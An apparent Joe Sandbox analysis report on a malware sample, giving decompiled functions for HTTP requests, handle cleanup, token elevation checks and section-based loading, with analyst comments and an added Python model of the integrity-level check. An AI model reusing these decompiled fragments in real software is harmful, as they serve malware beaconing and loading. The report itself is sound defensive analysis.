                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A), ref: 00401955
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401ECA,0000000A,?), ref: 0040195D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                    • String ID:
                                                    • API String ID: 1724014008-0
                                                    • Opcode ID: 236bc7e85519d2be923e6c4fcb0262230a58608b22daae9891fe3affc73656af
                                                    • Instruction ID: 58fe537eb58d13a7eb712ddccc2dbb528511b1cce2bfb0581a2e4740ba176d57
                                                    • Opcode Fuzzy Hash: 236bc7e85519d2be923e6c4fcb0262230a58608b22daae9891fe3affc73656af
                                                    • Instruction Fuzzy Hash: B021A4B2600209BFD710AFA4CD88EAE37ADEB48354F114036F715F71E0D6745945CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 93%
                                                    			E01095663(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                    				void* _t17;
                                                    				void* _t18;
                                                    				void* _t19;
                                                    				void* _t20;
                                                    				void* _t21;
                                                    				intOrPtr _t24;
                                                    				void* _t37;
                                                    				void* _t41;
                                                    				intOrPtr* _t45;
                                                    
                                                    				_t41 = __edi;
                                                    				_t37 = __ebx;
                                                    				_t45 = __eax;
                                                     				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                                     				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                                     					E010917ED(_t16, __ecx, 0xea60); // waits on the object at +0x20 (WaitForMultipleObjects in the subcall); 0xea60 = 60000 ms timeout
                                                     				}
                                                     				_t17 =  *(_t45 + 0x18);
                                                     				_push(_t37);
                                                     				_push(_t41);
                                                     				if(_t17 != 0) {
                                                     					InternetSetStatusCallback(_t17, 0); // detach the async status callback first, so no callback fires on a handle being torn down
                                                     					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                                     				}
                                                     				_t18 =  *(_t45 + 0x14);
                                                     				if(_t18 != 0) {
                                                     					InternetSetStatusCallback(_t18, 0);
                                                     					InternetCloseHandle( *(_t45 + 0x14));
                                                     				}
                                                     				_t19 =  *(_t45 + 0x10);
                                                     				if(_t19 != 0) {
                                                     					InternetSetStatusCallback(_t19, 0);
                                                     					InternetCloseHandle( *(_t45 + 0x10)); // +0x10, +0x14, +0x18: three WinINet handles released in reverse order of the fields
                                                     				}
                                                     				_t20 =  *(_t45 + 0x1c);
                                                     				if(_t20 != 0) {
                                                     					CloseHandle(_t20); // +0x1c and +0x20 are kernel object handles (closed with CloseHandle, not InternetCloseHandle)
                                                     				}
                                                     				_t21 =  *(_t45 + 0x20);
                                                     				if(_t21 != 0) {
                                                     					CloseHandle(_t21);
                                                     				}
                                                    				_t22 =  *((intOrPtr*)(_t45 + 8));
                                                    				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                                    					E0109692B(_t22);
                                                    					 *((intOrPtr*)(_t45 + 8)) = 0;
                                                    					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                                    				}
                                                    				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                                    				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                                    					E0109692B(_t23);
                                                    				}
                                                    				_t24 =  *_t45;
                                                    				if(_t24 != 0) {
                                                    					_t24 = E0109692B(_t24);
                                                    				}
                                                    				_t46 =  *((intOrPtr*)(_t45 + 4));
                                                    				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                                    					return E0109692B(_t46);
                                                    				}
                                                    				return _t24;
                                                    			}













                                                    APIs
                                                    • InternetSetStatusCallback.WININET(?,00000000), ref: 01095691
                                                    • InternetCloseHandle.WININET(?), ref: 01095696
                                                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010956A1
                                                    • InternetCloseHandle.WININET(?), ref: 010956A6
                                                    • InternetSetStatusCallback.WININET(?,00000000), ref: 010956B1
                                                    • InternetCloseHandle.WININET(?), ref: 010956B6
                                                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,01095C05,?,?,747581D0,00000000,00000000), ref: 010956C6
                                                    • CloseHandle.KERNEL32(?,00000000,00000102,?,?,01095C05,?,?,747581D0,00000000,00000000), ref: 010956D0
                                                      • Part of subcall function 010917ED: WaitForMultipleObjects.KERNEL32(00000002,01097B88,00000000,01097B88,?,?,?,01097B88,0000EA60), ref: 01091808
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                                    • String ID:
                                                    • API String ID: 2824497044-0
                                                    • Opcode ID: 32e01e4363bce311ec0748d123050f971d1d917f3ad440b88457b70a94c28077
                                                    • Instruction ID: a7b85438dd80f8abb954795470b674985bc2d0e9dca3e83f0bff65917f66c452
                                                    • Opcode Fuzzy Hash: 32e01e4363bce311ec0748d123050f971d1d917f3ad440b88457b70a94c28077
                                                    • Instruction Fuzzy Hash: 7B116A76600748ABCB31AFABFCA4C4BBBEDBF582043550D5AE2D6D3510C735F8449AA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    C-Code - Quality: 100%
                                                    			E010930E2(long* _a4) {
                                                    				long _v8;
                                                    				void* _v12;
                                                    				void _v16;
                                                    				long _v20;
                                                    				int _t33;
                                                    				void* _t46;
                                                    
                                                     				_v16 = 1; // default answer: "elevated"
                                                     				_v20 = 0x2000; // default integrity RID: SECURITY_MANDATORY_MEDIUM_RID
                                                     				if( *0x109a2fc > 5) { // global compared against 5: consistent with an OS major version check (Vista = 6 and later have UAC and integrity levels)
                                                     					_v16 = 0;
                                                     					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // current process pseudo-handle, READ_CONTROL | TOKEN_QUERY
                                                     						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed; class 0x14 = TokenElevation, fills TOKEN_ELEVATION.TokenIsElevated
                                                     						_v8 = 0;
                                                     						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed; class 0x19 = TokenIntegrityLevel, size query only
                                                     						if(_v8 != 0) {
                                                     							_t46 = E01096A51(_v8); // RtlAllocateHeap for the TOKEN_MANDATORY_LABEL buffer
                                                     							if(_t46 != 0) {
                                                     								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                     								if(_t33 != 0) {
                                                     									// *_t46 is Label.Sid; the last sub-authority of that S-1-16-<RID> SID is the integrity level
                                                     									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                    								}
                                                    								E0109692B(_t46);
                                                    							}
                                                    						}
                                                    						CloseHandle(_v12);
                                                    					}
                                                    				}
                                                    				 *_a4 = _v20;
                                                    				return _v16;
                                                    			}










                                                    APIs
                                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 01093114
                                                     • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 01093134
                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 01093144
                                                    • CloseHandle.KERNEL32(00000000), ref: 01093194
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 01093167
                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 0109316F
                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 0109317F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                    • String ID:
                                                    • API String ID: 1295030180-0
                                                    • Opcode ID: c0096c28d065258c58e97663d0ff4410c7bdfbf81b60396bf4f4c327060f75c8
                                                    • Instruction ID: fb247928cf1e3c88a4ae617016f8a49924c03cd47941dab47a4498ffc55861cb
                                                    • Opcode Fuzzy Hash: c0096c28d065258c58e97663d0ff4410c7bdfbf81b60396bf4f4c327060f75c8
                                                    • Instruction Fuzzy Hash: E42119B5900219FFEF109FA4DC54EEEBBB9FB48304F0000A5FA51A6160C7769A54EF60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
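The token check in E010930E2 above reduces to two facts: the TOKEN_ELEVATION flag, and the last sub-authority of the mandatory label SID (S-1-16-RID), which Windows uses directly as the integrity level. The following is an added example, not code from the report or from the analysed sample: it reproduces the SID arithmetic on raw SID bytes so it runs anywhere, and models the function's decision flow, including the pre-Vista default of "elevated, medium". The assumption that the global at 0x109a2fc holds the OS major version is labelled in the code; all SID blobs are constructed test data.

```python
"""Added example: model of the elevation / integrity-level check in E010930E2."""
import struct

SECURITY_MANDATORY_LABEL_AUTHORITY = 16   # identifier authority of S-1-16-* label SIDs
SECURITY_MANDATORY_MEDIUM_RID = 0x2000    # default the sample reports without querying

# Well-known mandatory label RIDs (SECURITY_MANDATORY_*_RID in winnt.h).
INTEGRITY_LEVELS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected Process",
}


def build_sid(identifier_authority: int, sub_authorities) -> bytes:
    """Serialise a SID: revision (1 byte), count (1), authority (6, big-endian), subauths (4 each, little-endian)."""
    subs = list(sub_authorities)
    if not 1 <= len(subs) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    return (bytes([1, len(subs)])
            + identifier_authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def parse_sid(blob: bytes):
    """Parse a binary SID; returns (revision, identifier_authority, [sub_authorities])."""
    if len(blob) < 8:
        raise ValueError("SID header truncated")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError("unsupported SID revision %d" % revision)
    if count == 0 or count > 15 or len(blob) < 8 + 4 * count:
        raise ValueError("bad sub-authority count or truncated SID")
    authority = int.from_bytes(blob[2:8], "big")
    subs = list(struct.unpack_from("<%dI" % count, blob, 8))
    return revision, authority, subs


def sid_to_string(blob: bytes) -> str:
    revision, authority, subs = parse_sid(blob)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def integrity_rid(label_sid: bytes) -> int:
    """Same arithmetic as GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1) in the sample."""
    _, authority, subs = parse_sid(label_sid)
    if authority != SECURITY_MANDATORY_LABEL_AUTHORITY:
        raise ValueError("not a mandatory label SID: " + sid_to_string(label_sid))
    return subs[-1]


def integrity_level_name(rid: int) -> str:
    """Integrity is compared numerically, so an intermediate RID ranks as the highest defined level at or below it."""
    return INTEGRITY_LEVELS[max(k for k in INTEGRITY_LEVELS if k <= rid)]


def classify_token(os_major_version: int, token_is_elevated: int, label_sid: bytes):
    """Model of E010930E2's outputs: (elevated flag, integrity RID).

    Assumption: the global at 0x109a2fc that the sample compares against 5 is the
    OS major version. On anything older than Vista (major <= 5) the function never
    opens the token and reports elevated=1 with medium integrity.
    """
    if os_major_version <= 5:
        return 1, SECURITY_MANDATORY_MEDIUM_RID
    return int(bool(token_is_elevated)), integrity_rid(label_sid)


if __name__ == "__main__":
    # Constructed sample: an elevated admin token whose label is S-1-16-12288 (High).
    high = build_sid(SECURITY_MANDATORY_LABEL_AUTHORITY, [0x3000])
    elevated, rid = classify_token(10, 1, high)
    print(sid_to_string(high), hex(rid), integrity_level_name(rid),
          "elevated" if elevated else "limited")
```

On a live Windows host the same bytes come back from GetTokenInformation(TokenIntegrityLevel) inside a TOKEN_MANDATORY_LABEL, whose first field is the pointer the decompiled code dereferences as *_t46; the parser above is fed that SID directly.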

                                                    Control-flow Graph

                                                    C-Code - Quality: 64%
                                                    			E0109581D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _t9;
                                                    				intOrPtr _t13;
                                                    				char* _t19;
                                                    				char* _t28;
                                                    				void* _t33;
                                                    				void* _t34;
                                                    				char* _t36;
                                                    				void* _t38;
                                                    				intOrPtr* _t39;
                                                    				char* _t40;
                                                    				char* _t42;
                                                    				char* _t43;
                                                    
                                                    				_t34 = __edx;
                                                    				_push(__ecx);
                                                     				_t9 =  *0x109a348; // 0xa6d5a8
                                                     				_t1 = _t9 + 0x109b624; // 0x253d7325 read as little-endian bytes is "%s=%", the start of a "%s=%..." format template
                                                     				_t36 = 0;
                                                     				_t28 = E01097877(__ecx, _t1); // expands the template into a heap string (lstrlen + sprintf in the subcall, see APIs below)
                                                    				if(_t28 != 0) {
                                                    					_t39 = __imp__;
                                                    					_t13 =  *_t39(_t28, _t38);
                                                    					_v8 = _t13;
                                                    					_t6 =  *_t39(_a4) + 1; // 0x1b09601
                                                    					_t40 = E01096A51(_v8 + _t6);
                                                    					if(_t40 != 0) {
                                                    						strcpy(_t40, _t28);
                                                    						_pop(_t33);
                                                    						__imp__(_t40, _a4);
                                                    						_t19 = E01095DB1(_t33, _t34, _t40, _a8); // executed
                                                    						_t36 = _t19;
                                                    						E0109692B(_t40);
                                                     					_t42 = E01093DC1(StrTrimA(_t36, "="), _t36); // StrTrimA strips leading/trailing '=' from the E01095DB1 result before E01093DC1 reformats it (_snprintf in the subcall)
                                                    						if(_t42 != 0) {
                                                    							E0109692B(_t36);
                                                    							_t36 = _t42;
                                                    						}
                                                    						_t43 = E0109229C(_t36, _t33);
                                                    						if(_t43 != 0) {
                                                    							E0109692B(_t36);
                                                    							_t36 = _t43;
                                                    						}
                                                    					}
                                                    					E0109692B(_t28);
                                                    				}
                                                    				return _t36;
                                                    			}

















                                                    APIs
                                                      • Part of subcall function 01097877: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01095836,253D7325,00000000,00000000,?,775EC740,0109384E), ref: 010978DE
                                                      • Part of subcall function 01097877: sprintf.NTDLL ref: 010978FF
                                                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095848
                                                    • lstrlen.KERNEL32(00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01095850
                                                      • Part of subcall function 01096A51: RtlAllocateHeap.NTDLL(00000000,00000000,01093005), ref: 01096A5D
                                                    • strcpy.NTDLL ref: 01095867
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 01095872
                                                      • Part of subcall function 01095DB1: lstrlen.KERNEL32(00000000,00000000,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 01095DC2
                                                      • Part of subcall function 0109692B: RtlFreeHeap.NTDLL(00000000,00000000,01093092,00000000,?,00000000,00000000), ref: 01096937
                                                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109588F
                                                      • Part of subcall function 01093DC1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,0109589B,00000000,?,775EC740,0109384E,00000000,01B09600), ref: 01093DCB
                                                      • Part of subcall function 01093DC1: _snprintf.NTDLL ref: 01093E29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                     • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                     • Associated: 00000007.00000002.820863616.000000000109C000.00000004.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                    • String ID: =
                                                    • API String ID: 2864389247-1428090586
                                                    • Opcode ID: 040b2a3b314d881eda92dd67b3edd20a0d81b5252da5aeb2c4f4d8fb2b6a7c80
                                                    • Instruction ID: 0d38b185edc9f50249fe48b9d4f24f23131cc467d750cee890a21d9ba8135c6a
                                                    • Opcode Fuzzy Hash: 040b2a3b314d881eda92dd67b3edd20a0d81b5252da5aeb2c4f4d8fb2b6a7c80
                                                    • Instruction Fuzzy Hash: 0311C6335011267B5F1277B99CB4CEF3BDD9F995543050056FA81AB104DE79DC02A7E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                     Basic blocks (node: address range, calls):
                                                     • 349: 4013fb-40140d, call 401f0b
                                                     • 352: 401413-401448, GetModuleHandleA, GetProcAddress
                                                     • 353: 4014ce
                                                     • 354: 4014d5-4014dc
                                                     • 355: 4014c6-4014cc, call 4013e6
                                                     • 356: 40144a-40145e, GetProcAddress
                                                     • 358: 401460-401474, GetProcAddress
                                                     • 360: 401476-40148a, GetProcAddress
                                                     • 361: 40148c-4014a0, GetProcAddress
                                                     • 362: 4014a2-4014b3, call 401b6a
                                                     • 364: 4014b8-4014bd
                                                     • 365: 4014bf-4014c4
                                                     Edges: 349->352, 349->353, 352->355, 352->356, 353->354, 355->354, 356->355, 356->358, 358->355, 358->360, 360->355, 360->361, 361->355, 361->362, 362->364, 364->355, 364->365, 365->354
                                                    C-Code - Quality: 100%
                                                    			E004013FB(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                    				intOrPtr _v8;
                                                    				_Unknown_base(*)()* _t29;
                                                    				_Unknown_base(*)()* _t33;
                                                    				_Unknown_base(*)()* _t36;
                                                    				_Unknown_base(*)()* _t39;
                                                    				_Unknown_base(*)()* _t42;
                                                    				intOrPtr _t46;
                                                    				struct HINSTANCE__* _t50;
                                                    				intOrPtr _t56;
                                                    
                                                     				_t56 = E00401F0B(0x20); // 0x20-byte context: +4/+8 the caller's arguments, +0xc..+0x1c five resolved function pointers
                                                     				if(_t56 == 0) {
                                                     					_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                     				} else {
                                                     					_t50 = GetModuleHandleA( *0x403184 + 0x404014); // *0x403184 is added to every image-relative string address below (consistent with a relocation delta)
                                                     					_v8 = 0x7f; // ERROR_PROC_NOT_FOUND: status if any GetProcAddress below fails
                                                     					_t29 = GetProcAddress(_t50,  *0x403184 + 0x404151);
                                                    					 *(_t56 + 0xc) = _t29;
                                                    					if(_t29 == 0) {
                                                    						L8:
                                                    						E004013E6(_t56);
                                                    					} else {
                                                    						_t33 = GetProcAddress(_t50,  *0x403184 + 0x404161);
                                                    						 *(_t56 + 0x10) = _t33;
                                                    						if(_t33 == 0) {
                                                    							goto L8;
                                                    						} else {
                                                    							_t36 = GetProcAddress(_t50,  *0x403184 + 0x404174);
                                                    							 *(_t56 + 0x14) = _t36;
                                                    							if(_t36 == 0) {
                                                    								goto L8;
                                                    							} else {
                                                    								_t39 = GetProcAddress(_t50,  *0x403184 + 0x404189);
                                                    								 *(_t56 + 0x18) = _t39;
                                                    								if(_t39 == 0) {
                                                    									goto L8;
                                                    								} else {
                                                    									_t42 = GetProcAddress(_t50,  *0x403184 + 0x40419f);
                                                    									 *(_t56 + 0x1c) = _t42;
                                                    									if(_t42 == 0) {
                                                    										goto L8;
                                                    									} else {
                                                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                    										_t46 = E00401B6A(_t56, _a12); // executed
                                                    										_v8 = _t46;
                                                    										if(_t46 != 0) {
                                                    											goto L8;
                                                    										} else {
                                                    											 *_a16 = _t56;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _v8;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00401F0B: RtlAllocateHeap.NTDLL(00000000,?,0040119F,00000030,?,00000000), ref: 00401F17
                                                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,0040151B,?,?,?,?,?,00000002,?,?), ref: 0040141F
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401441
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401457
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040146D
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401483
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401499
                                                      • Part of subcall function 00401B6A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401BC7
                                                      • Part of subcall function 00401B6A: memset.NTDLL ref: 00401BE9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                    • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                                    • String ID:
                                                    • API String ID: 3012371009-0
                                                    • Opcode ID: acea6eece1d5ae864dd672754777c824f0b556606ebdacff0ea342eea23e8c8a
                                                    • Instruction ID: 450e7f49be0a20eebf8d2adf2def030f8a7faa26dc07ecb248e956a79a49ed05
                                                    • Opcode Fuzzy Hash: acea6eece1d5ae864dd672754777c824f0b556606ebdacff0ea342eea23e8c8a
                                                    • Instruction Fuzzy Hash: 2D214FB060060BAFD710DF6ACE84D66B7FCAF54300701457AE909EB371EB74E9008B68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Control-flow graph (rendered image not captured): basic blocks 10947b2-1094828; calls E010955B2, E01097AC4, ResetEvent (x2), HttpSendRequestA, GetLastError, SetEvent.
                                                    C-Code - Quality: 100%
                                                    			E010947B2(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                    				void* __esi;
                                                    				long _t10;
                                                    				void* _t18;
                                                    				void* _t22;
                                                    
                                                    				_t9 = __eax;
                                                    				_t22 = __eax;
                                                    				if(_a4 != 0 && E010955B2(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                    					L9:
                                                    					return GetLastError();
                                                    				}
                                                    				_t10 = E01097AC4(_t9, _t18, _t22, _a8); // executed
                                                    				if(_t10 == 0) {
                                                    					ResetEvent( *(_t22 + 0x1c));
                                                    					ResetEvent( *(_t22 + 0x20));
                                                    					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                                    						SetEvent( *(_t22 + 0x1c));
                                                    						goto L7;
                                                    					} else {
                                                    						_t10 = GetLastError();
                                                    						if(_t10 == 0x3e5) {
                                                    							L7:
                                                    							_t10 = 0;
                                                    						}
                                                    					}
                                                    				}
                                                    				if(_t10 == 0xffffffff) {
                                                    					goto L9;
                                                    				}
                                                    				return _t10;
                                                    			}

                                                    APIs
                                                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,01095BA4,?,?,747581D0,00000000), ref: 010947EC
                                                    • ResetEvent.KERNEL32(?), ref: 010947F1
                                                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 010947FE
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?,?), ref: 01094809
                                                    • GetLastError.KERNEL32(?,?,00000102,01095BA4,?,?,747581D0,00000000), ref: 01094824
                                                      • Part of subcall function 010955B2: lstrlen.KERNEL32(00000000,00000008,?,74714D40,?,?,010947D1,?,?,?,?,00000102,01095BA4,?,?,747581D0), ref: 010955BE
                                                      • Part of subcall function 010955B2: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010947D1,?,?,?,?,00000102,01095BA4,?), ref: 0109561C
                                                      • Part of subcall function 010955B2: lstrcpy.KERNEL32(00000000,00000000), ref: 0109562C
                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,010938B4,00000000,?), ref: 01094817
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                                    • String ID:
                                                    • API String ID: 3739416942-0
                                                    • Opcode ID: 4df602af54c9f9d1518d1cf9606c43ef559e0d367b0de060eb759c91a6e821a3
                                                    • Instruction ID: abf06f51975cc7b1cd1655483a5cf7a54e933a76406f6bd013b3d4f1a31e588d
                                                    • Opcode Fuzzy Hash: 4df602af54c9f9d1518d1cf9606c43ef559e0d367b0de060eb759c91a6e821a3
                                                    • Instruction Fuzzy Hash: AB01DF31104241AFDF316A65DD24F1F7AE4BF88764F104625F2E1D50E1D621E402EA20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 50%
                                                    			E0109460D(void** __esi) {
                                                    				intOrPtr _v0;
                                                    				intOrPtr _t4;
                                                    				intOrPtr _t6;
                                                    				void* _t8;
                                                    				void* _t9;
                                                    				intOrPtr _t10;
                                                    				void* _t11;
                                                    				void** _t13;
                                                    
                                                    				_t13 = __esi;
                                                    				_t4 =  *0x109a3cc; // 0x1b09600
                                                    				__imp__(_t4 + 0x40);
                                                    				while(1) {
                                                    					_t6 =  *0x109a3cc; // 0x1b09600
                                                    					_t1 = _t6 + 0x58; // 0x0
                                                    					if( *_t1 == 0) {
                                                    						break;
                                                    					}
                                                    					Sleep(0xa);
                                                    				}
                                                    				_t8 =  *_t13;
                                                    				if(_t8 != 0 && _t8 != 0x109a030) {
                                                    					HeapFree( *0x109a2d8, 0, _t8);
                                                    				}
                                                    				_t9 = E01093297(_v0, _t13); // executed
                                                    				_t13[1] = _t9;
                                                    				_t10 =  *0x109a3cc; // 0x1b09600
                                                    				_t11 = _t10 + 0x40;
                                                    				__imp__(_t11);
                                                    				return _t11;
                                                    			}

                                                    APIs
                                                    • RtlEnterCriticalSection.NTDLL(01B095C0), ref: 01094616
                                                    • Sleep.KERNEL32(0000000A), ref: 01094620
                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 01094648
                                                    • RtlLeaveCriticalSection.NTDLL(01B095C0), ref: 01094664
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                    • String ID: Uqt
                                                    • API String ID: 58946197-2320327147
